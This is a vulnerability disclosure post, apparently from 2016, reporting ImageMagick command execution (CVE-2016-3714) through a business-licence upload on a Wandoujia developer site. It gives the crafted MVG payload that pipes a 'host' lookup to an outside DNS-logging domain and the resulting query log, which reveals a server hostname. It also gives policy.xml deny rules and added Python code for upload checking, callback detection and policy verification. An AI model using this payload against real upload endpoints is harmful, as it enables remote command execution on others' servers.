
[July vulnerability disclosure] Command execution on a Wandoujia (豌豆荚) site







It seems the earlier ones haven't been fixed.

Details:

CVE-2016-3714 and a new bypass method



Reference: http://drops.wooyun.org/papers/15589



http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/



Developer site

http://open.wandoujia.com/account/info

[Screenshot: QQ20160531-0.png]



As a certified developer, at the business license upload point, upload the crafted image



```
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|host zzz.zzz.dnslog.info'
pop graphic-context
```
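The payload above works because ImageMagick selects the coder from the file's content, not its extension: a file named `licence.png` whose body is MVG text is still handed to the MVG coder. The following is an added example (not code from the original report or from Wandoujia) of the content check an upload handler should apply before anything reaches ImageMagick: it sniffs the magic bytes, requires them to agree with the declared extension, and rejects text that looks like MVG. The magic-byte table, the `MVG_HINT` pattern and the sample inputs are all constructed for this example.

```python
import re

# Magic bytes of the raster formats a business-licence upload would legitimately accept.
# Constructed table for this example; extend as needed.
RASTER_MAGIC = [
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("jpeg", b"\xff\xd8\xff"),
    ("gif", b"GIF87a"),
    ("gif", b"GIF89a"),
]

# Directives that mark text-format MVG input (the vulnerable path in the report).
MVG_HINT = re.compile(rb"^\s*(push graphic-context|viewbox\s|image\s+\w+\s)", re.I | re.M)

# Extensions the form accepts, mapped to the format the content must actually have.
EXT_TO_FORMAT = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}


def sniff_format(data: bytes):
    """Return the raster format implied by the leading bytes, or None if none matches."""
    for name, magic in RASTER_MAGIC:
        if data.startswith(magic):
            return name
    return None


def check_upload(data: bytes, filename: str):
    """Return (accepted, reason). Accept only when the sniffed content agrees with the extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = EXT_TO_FORMAT.get(ext)
    if expected is None:
        return False, "extension-not-allowed"
    # Look for MVG directives in the head of the file regardless of what the name claims.
    if MVG_HINT.search(data[:4096]):
        return False, "mvg-text-detected"
    actual = sniff_format(data)
    if actual is None:
        return False, "no-raster-magic"
    if actual != expected:
        return False, "extension-mismatch:" + actual
    return True, "ok"


# Constructed inputs: harmless MVG text with an image extension, and a minimal PNG header.
MVG_SAMPLE = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + bytes(17)

if __name__ == "__main__":
    for data, name in [(MVG_SAMPLE, "licence.png"), (PNG_SAMPLE, "licence.png"),
                       (PNG_SAMPLE, "licence.jpg"), (b"hello", "licence.gif")]:
        print(name, check_upload(data, name))
```

This check stops the extension-renaming trick shown in the report, but it is a complement to the policy.xml fix below, not a replacement for it: ImageMagick can still reach the dangerous coders through other input formats, so the coders themselves must be disabled on the server.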





Proof of vulnerability:

Requests observed in CloudEye



```
31-May-2016 22:23:06.450 queries: client 111.206.15.136#3139 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:06.631 queries: client 111.206.14.132#38484 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
31-May-2016 22:23:06.818 queries: client 111.206.14.132#41208 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN MX -ED (128.199.200.236)
31-May-2016 22:23:10.717 queries: client 111.206.14.132#62669 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:10.917 queries: client 111.206.15.136#23942 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
```





ag-devcenter0-cnc1.hlg01 is the hostname of the current server
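The same log that proves the bug is also what the defender can alert on: an image-processing host should not resolve names outside the organisation's own domains, and a query whose leading labels equal the server's hostname is a strong sign of a command-execution callback. The following is an added example (not code from the original report) that parses BIND-style query-log lines like those above and flags such lookups. The `LINE_RE` pattern, the allowed-domain list (`example.com`) and the benign line at the end of `SAMPLE_LOG` are constructed for this example; the other lines are taken from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Three lines from the report above plus one constructed benign lookup.
SAMPLE_LOG = """\
31-May-2016 22:23:06.450 queries: client 111.206.15.136#3139 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:06.631 queries: client 111.206.14.132#38484 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
31-May-2016 22:23:06.818 queries: client 111.206.14.132#41208 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN MX -ED (128.199.200.236)
31-May-2016 22:23:11.002 queries: client 111.206.14.132#40001 (updates.example.com): query: updates.example.com IN A -ED (128.199.200.236)
"""

# Constructed pattern for the "queries:" category of a BIND query log.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) queries: client (?P<ip>[\d.]+)#(?P<port>\d+) "
    r"\((?P<qname>[^)]+)\): query: \S+ IN (?P<qtype>\S+)"
)


@dataclass
class Query:
    ts: str
    client: str
    qname: str
    qtype: str


@dataclass
class Alert:
    query: Query
    leaked_host: Optional[str]   # known hostname found as the leading labels of qname
    under_allowed: bool          # True if qname is inside an allowed domain


def parse_query_log(text: str) -> List[Query]:
    """Parse every line that matches the query-log format; skip anything else."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append(Query(m["ts"], m["ip"], m["qname"].lower().rstrip("."), m["qtype"]))
    return out


def find_callbacks(queries: List[Query], allowed_suffixes, known_hosts) -> List[Alert]:
    """Flag lookups outside the allowed domains or carrying a known hostname as prefix."""
    alerts = []
    for q in queries:
        under_allowed = any(q.qname == s or q.qname.endswith("." + s) for s in allowed_suffixes)
        leaked = next((h for h in known_hosts if q.qname.startswith(h.lower() + ".")), None)
        if leaked is not None or not under_allowed:
            alerts.append(Alert(q, leaked, under_allowed))
    return alerts


if __name__ == "__main__":
    qs = parse_query_log(SAMPLE_LOG)
    for a in find_callbacks(qs, ["example.com"], ["ag-devcenter0-cnc1.hlg01"]):
        print(a.query.client, a.query.qtype, a.query.qname, "leaked-host=" + str(a.leaked_host))
```

In practice the `known_hosts` list comes from inventory and `allowed_suffixes` from the resolver's split-horizon configuration; the point of the two-signal rule is that the hostname-prefix indicator fires even when an attacker picks a callback domain the allow-list happens to cover.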



Fix:

Add the following to /etc/ImageMagick/policy.xml






```
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="path" rights="none" pattern="|*"/>
</policymap>
```
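A policy.xml edit is easy to get wrong (wrong file, rule left out, typo in a pattern), so it is worth checking mechanically. The following is an added example (not code from the original report) that parses a policy.xml document and reports which of the six deny rules above are missing; it shows a weak policy with only resource limits next to the same file with the rules added. The two sample policies and the `check_policy_file` path default are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Deny rules the fix above requires: (domain, pattern) must appear with rights="none".
REQUIRED_DENY = {
    ("coder", "EPHEMERAL"),
    ("coder", "URL"),
    ("coder", "HTTPS"),
    ("coder", "MVG"),
    ("coder", "MSL"),
    ("path", "|*"),
}


def denied_rules(policy_xml: str) -> set:
    """Collect every (domain, pattern) that the document sets to rights="none"."""
    root = ET.fromstring(policy_xml)
    if root.tag != "policymap":
        raise ValueError("not a policy.xml document: root is <%s>" % root.tag)
    return {
        (p.get("domain"), p.get("pattern"))
        for p in root.iter("policy")
        if p.get("rights") == "none"
    }


def missing_rules(policy_xml: str) -> set:
    """Return the required deny rules that are absent from the document."""
    return REQUIRED_DENY - denied_rules(policy_xml)


def check_policy_file(path="/etc/ImageMagick/policy.xml") -> set:
    """Convenience wrapper for the installed file; the default path is the one the report names."""
    with open(path, encoding="utf-8") as fh:
        return missing_rules(fh.read())


# Constructed: a policy that only sets resource limits (the weak state) ...
WEAK_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>
"""

# ... and the same file with the report's deny rules added.
HARDENED_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="path" rights="none" pattern="|*"/>
</policymap>
"""

if __name__ == "__main__":
    print("weak policy is missing:", sorted(missing_rules(WEAK_POLICY)))
    print("hardened policy is missing:", sorted(missing_rules(HARDENED_POLICY)))
```

The checker only confirms the rules are written in the file it is given; ImageMagick may load a policy.xml from a different directory depending on how it was built, so confirm the effective policy on the host itself with `convert -list policy` after editing.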




Posted: 2016-7-16 | Views: 0 | Replies: 0